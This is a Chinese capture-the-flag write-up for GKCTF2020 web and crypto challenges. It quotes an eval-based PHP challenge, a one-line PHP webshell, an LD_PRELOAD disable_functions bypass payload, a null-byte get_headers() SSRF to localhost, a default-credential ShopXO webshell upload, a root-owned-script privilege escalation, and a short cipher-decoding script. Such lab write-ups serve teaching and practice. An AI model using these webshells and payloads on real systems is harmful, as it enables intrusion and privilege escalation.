GKCTF2020--部分复现(加密和web)
GKCTF2020–web
CheckIN
title>Check_In</title>
highlight_file(__FILE__);
class ClassName
{
public $code = null;
public $decode = null;
function __construct()
{
$this->code = @$this->x()['Ginkgo'];
$this->decode = @base64_decode( $this->code );
@Eval($this->decode);
}
public function x()
{
return $_REQUEST;
}
}
new ClassName();
查看源码,不难发现,
有个eval()函数,并且将我们传入的参数进行base64解码再传入eval
没有任何过滤,传入ls 发现没用
phpinfo();
看看
看到disable_function
禁用了系统函数,我们写个马进去试试
eval($_POST[penson]);
由于他禁用了system函数,所以用蚁剑连接看看
发现根目录下有个readflag
估计就是要我们绕过disabled_function了
可以通过LD_PRELOAD这个环境变量,具体原理百度都能搜到,就不放了。
POC链接
下载他的poc链接
在传文件的时候,发现/var/html/www下并没有写权限,而其他目录却有
所以我上传到/vat/tmp目录下
然后用include()包含我们上传的php文件
include('/var/tmp/bypass_disablefunc.php');
可以发现成功包含,利用POC执行/readflag
payload
Ginkgo=aW5jbHVkZSgnL3Zhci90bXAvYnlwYXNzX2Rpc2FibGVmdW5jLnBocCcpOw==&cmd=/readflag&outpath=/tmp/xx&sopath=/var/tmp/bypass_disablefunc_x64.so
cve版签到
题目给出了提示
搜一波
CVE漏洞介绍
关键在于get_headers()函数
点一下进去
大家应该都知道127.0.0.1是本地嘛,利用那个cve漏洞,加%00截断,访问本地进去
他说要是123
改成123
flag就出来了
[GKCTF2020]老八小超市儿
百度搜搜ShopXo漏洞
漏洞复现地址
进到后台直接使用默认账号密码登录
getshell
就按照教程来就行了
看上面给的链接一步一步来就行了,不多说了
Webshell的路径为/public/static/index/default/2.php
成功getshell
蚁剑连接
成功连接之后发现去根目录找flag,发现flag在/root目录下
这说明我们还得提权,获得更高的权限,可以发现有个特别红的玩意,我们点进去看看
有个python脚本,并且说出了他的位置,看一下python脚本
看的提示,说明这个脚本有root权限,属于root这个用户,并且这个脚本有写权限,
就可以根据这个python脚本来获取flag
因为这个脚本有写权限,就可以改下脚本,读取flag
但是呢这个脚本我们没有权限可以去执行,所以不行,回到根目录下的一个shell文件
他可以执行这个脚本
那咱们运行这个shell来看看
最终发现这个shell是可以成功运行的,flag到手
CRYPTO
小学生的密码学
把他给出的表达式一搜,就有仿射密码
base64编码即可
汉字的秘密
百度一搜会搜到当铺密码
当铺密码原理解释
然后你会发现第一个字符ascii加一就是F,第二个字符加2就是L
正好是flag
写脚本跑
a =[69,74,62,67,118,83,72,77,86,55,71,57,82,57,64,63,51,103]
str =""
j=0
for i in a:
j += 1
str +=chr(i+j)
print(i)
print(str)
把y改成括号即可